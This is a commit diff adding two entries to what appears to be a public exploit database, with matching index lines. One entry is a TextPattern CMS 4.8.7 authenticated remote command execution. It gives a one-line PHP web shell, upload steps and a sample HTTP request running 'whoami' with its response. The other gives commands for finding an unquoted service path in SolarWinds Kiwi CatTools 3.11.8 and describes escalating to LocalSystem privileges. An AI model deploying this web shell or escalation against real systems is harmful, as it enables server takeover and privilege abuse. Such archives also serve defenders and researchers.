DB: 2021-10-15
2 changes to exploits/shellcodes SolarWinds Kiwi CatTools 3.11.8 - Unquoted Service Path TextPattern CMS 4.8.7 - Remote Command Execution (RCE) (Authenticated)
This commit is contained in:
parent
679a62755b
commit
3e8f9f4d30
3 changed files with 83 additions and 0 deletions
43
exploits/php/webapps/50415.txt
Normal file
43
exploits/php/webapps/50415.txt
Normal file
|
@ -0,0 +1,43 @@
|
||||||
|
# Exploit Title: TextPattern CMS 4.8.7 - Remote Command Execution (RCE) (Authenticated)
|
||||||
|
# Date: 2021/09/06
|
||||||
|
# Exploit Author: Mert Daş merterpreter@gmail.com
|
||||||
|
# Software Link: https://textpattern.com/file_download/113/textpattern-4.8.7.zip
|
||||||
|
# Software web: https://textpattern.com/
|
||||||
|
# Tested on: Server: Xampp
|
||||||
|
|
||||||
|
First of all we should use file upload section to upload our shell.
|
||||||
|
Our shell contains this malicious code: <?PHP system($_GET['cmd']);?>
|
||||||
|
|
||||||
|
1) Go to content section .
|
||||||
|
2) Click Files and upload malicious php file.
|
||||||
|
3) go to yourserver/textpattern/files/yourphp.php?cmd=yourcode;
|
||||||
|
|
||||||
|
After upload our file , our request and response is like below :
|
||||||
|
|
||||||
|
Request:
|
||||||
|
|
||||||
|
GET /textpattern/files/cmd.php?cmd=whoami HTTP/1.1
|
||||||
|
Host: 127.0.0.1
|
||||||
|
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:89.0)
|
||||||
|
Gecko/20100101 Firefox/89.0
|
||||||
|
Accept:
|
||||||
|
text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
|
||||||
|
Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3
|
||||||
|
Accept-Encoding: gzip, deflate
|
||||||
|
Connection: close
|
||||||
|
Cookie: txp_login_public=18e9bf4a21admin; language=en-gb; currency=GBP;
|
||||||
|
PHPSESSID=cctbu6sj8571j2t6vp7g8ab7gi
|
||||||
|
Upgrade-Insecure-Requests: 1
|
||||||
|
|
||||||
|
|
||||||
|
Response:
|
||||||
|
|
||||||
|
HTTP/1.1 200 OK
|
||||||
|
Date: Thu, 10 Jun 2021 00:32:41 GMT
|
||||||
|
Server: Apache/2.4.48 (Win64) OpenSSL/1.1.1k PHP/7.4.20
|
||||||
|
X-Powered-By: PHP/7.4.20
|
||||||
|
Content-Length: 22
|
||||||
|
Connection: close
|
||||||
|
Content-Type: text/html; charset=UTF-8
|
||||||
|
|
||||||
|
pc\mertdas
|
38
exploits/windows/local/50416.txt
Normal file
38
exploits/windows/local/50416.txt
Normal file
|
@ -0,0 +1,38 @@
|
||||||
|
# Exploit Title: SolarWinds Kiwi CatTools 3.11.8 - Unquoted Service Path
|
||||||
|
# Exploit Author: Mert DAŞ
|
||||||
|
# Version: 3.11.8
|
||||||
|
# Date: 14.10.2021
|
||||||
|
# Vendor Homepage: https://www.solarwinds.com/
|
||||||
|
# Tested on: Windows 10
|
||||||
|
|
||||||
|
# Step to discover Unquoted Service Path :
|
||||||
|
|
||||||
|
--------------------------------------
|
||||||
|
C:\Users\Mert>sc qc CatTools
|
||||||
|
[SC] QueryServiceConfig SUCCESS
|
||||||
|
|
||||||
|
SERVICE_NAME: CatTools
|
||||||
|
TYPE : 10 WIN32_OWN_PROCESS
|
||||||
|
START_TYPE : 2 AUTO_START
|
||||||
|
ERROR_CONTROL : 1 NORMAL
|
||||||
|
BINARY_PATH_NAME : C:\Program Files (x86)\CatTools3\nssm.exe
|
||||||
|
LOAD_ORDER_GROUP :
|
||||||
|
TAG : 0
|
||||||
|
DISPLAY_NAME : CatTools
|
||||||
|
DEPENDENCIES :
|
||||||
|
SERVICE_START_NAME : LocalSystem
|
||||||
|
---------------------------------------------
|
||||||
|
|
||||||
|
Or:
|
||||||
|
-------------------------
|
||||||
|
C:\Users\Mert>wmic service get name,displayname,pathname,startmode |findstr
|
||||||
|
/i "auto" |findstr /i /v "c:\windows\\" |findstr /i /v """
|
||||||
|
----------------------
|
||||||
|
|
||||||
|
#Exploit:
|
||||||
|
|
||||||
|
A successful attempt would require the local user to be able to insert
|
||||||
|
their code in the system root path undetected by the OS or other security
|
||||||
|
applications where it could potentially be executed during application
|
||||||
|
startup or reboot. If successful, the local user's code would execute with
|
||||||
|
the elevated privileges of the application.
|
|
@ -11348,6 +11348,7 @@ id,file,description,date,author,type,platform,port
|
||||||
50332,exploits/windows/local/50332.py,"Ether_MP3_CD_Burner 1.3.8 - Buffer Overflow (SEH)",1970-01-01,stresser,local,windows,
|
50332,exploits/windows/local/50332.py,"Ether_MP3_CD_Burner 1.3.8 - Buffer Overflow (SEH)",1970-01-01,stresser,local,windows,
|
||||||
50337,exploits/windows/local/50337.ps1,"XAMPP 7.4.3 - Local Privilege Escalation",1970-01-01,"Salman Asad",local,windows,
|
50337,exploits/windows/local/50337.ps1,"XAMPP 7.4.3 - Local Privilege Escalation",1970-01-01,"Salman Asad",local,windows,
|
||||||
50385,exploits/linux/local/50385.txt,"Google SLO-Generator 2.0.0 - Code Execution",1970-01-01,"Kiran Ghimire",local,linux,
|
50385,exploits/linux/local/50385.txt,"Google SLO-Generator 2.0.0 - Code Execution",1970-01-01,"Kiran Ghimire",local,linux,
|
||||||
|
50416,exploits/windows/local/50416.txt,"SolarWinds Kiwi CatTools 3.11.8 - Unquoted Service Path",1970-01-01,"Mert Daş",local,windows,
|
||||||
1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",1970-01-01,kralor,remote,windows,80
|
1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",1970-01-01,kralor,remote,windows,80
|
||||||
2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",1970-01-01,RoMaNSoFt,remote,windows,80
|
2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",1970-01-01,RoMaNSoFt,remote,windows,80
|
||||||
5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",1970-01-01,"Marcin Wolak",remote,windows,139
|
5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",1970-01-01,"Marcin Wolak",remote,windows,139
|
||||||
|
@ -42672,6 +42673,7 @@ id,file,description,date,author,type,platform,port
|
||||||
47161,exploits/php/webapps/47161.php,"MyBB < 1.8.21 - Remote Code Execution",1970-01-01,"Giovanni Chhatta",webapps,php,
|
47161,exploits/php/webapps/47161.php,"MyBB < 1.8.21 - Remote Code Execution",1970-01-01,"Giovanni Chhatta",webapps,php,
|
||||||
47177,exploits/php/webapps/47177.txt,"Moodle Filepicker 3.5.2 - Server Side Request Forgery",1970-01-01,"Fabian Mosch_ Nick Theisinger",webapps,php,80
|
47177,exploits/php/webapps/47177.txt,"Moodle Filepicker 3.5.2 - Server Side Request Forgery",1970-01-01,"Fabian Mosch_ Nick Theisinger",webapps,php,80
|
||||||
47179,exploits/jsp/webapps/47179.py,"Ahsay Backup 8.1.1.50 - Insecure File Upload and Code Execution (Authenticated)",1970-01-01,"Wietse Boonstra",webapps,jsp,
|
47179,exploits/jsp/webapps/47179.py,"Ahsay Backup 8.1.1.50 - Insecure File Upload and Code Execution (Authenticated)",1970-01-01,"Wietse Boonstra",webapps,jsp,
|
||||||
|
50415,exploits/php/webapps/50415.txt,"TextPattern CMS 4.8.7 - Remote Command Execution (RCE) (Authenticated)",1970-01-01,"Mert Daş",webapps,php,
|
||||||
47180,exploits/jsp/webapps/47180.rb,"Ahsay Backup 7.x - 8.1.1.50 - Authenticated Arbitrary File Upload / Remote Code Execution (Metasploit)",1970-01-01,"Wietse Boonstra",webapps,jsp,443
|
47180,exploits/jsp/webapps/47180.rb,"Ahsay Backup 7.x - 8.1.1.50 - Authenticated Arbitrary File Upload / Remote Code Execution (Metasploit)",1970-01-01,"Wietse Boonstra",webapps,jsp,443
|
||||||
47181,exploits/jsp/webapps/47181.txt,"Ahsay Backup 7.x - 8.1.1.50 - XML External Entity Injection",1970-01-01,"Wietse Boonstra",webapps,jsp,80
|
47181,exploits/jsp/webapps/47181.txt,"Ahsay Backup 7.x - 8.1.1.50 - XML External Entity Injection",1970-01-01,"Wietse Boonstra",webapps,jsp,80
|
||||||
47182,exploits/php/webapps/47182.html,"WordPress Plugin Simple Membership 3.8.4 - Cross-Site Request Forgery",1970-01-01,rubyman,webapps,php,80
|
47182,exploits/php/webapps/47182.html,"WordPress Plugin Simple Membership 3.8.4 - Cross-Site Request Forgery",1970-01-01,rubyman,webapps,php,80
|
||||||
|
|
Can't render this file because it is too large.
|
Loading…
Add table
Reference in a new issue